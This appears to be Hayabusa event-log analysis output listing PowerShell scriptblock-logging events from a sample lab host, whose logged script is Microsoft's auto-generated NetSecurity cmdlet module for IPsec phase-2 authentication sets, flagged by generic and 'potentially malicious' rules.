try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if 
($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } 
else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' -Alias '*' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and 
(@('ByDisplayName'",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP2AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase2AuthSet' -Alias '*' function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, 
$script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.561 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,") -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains 
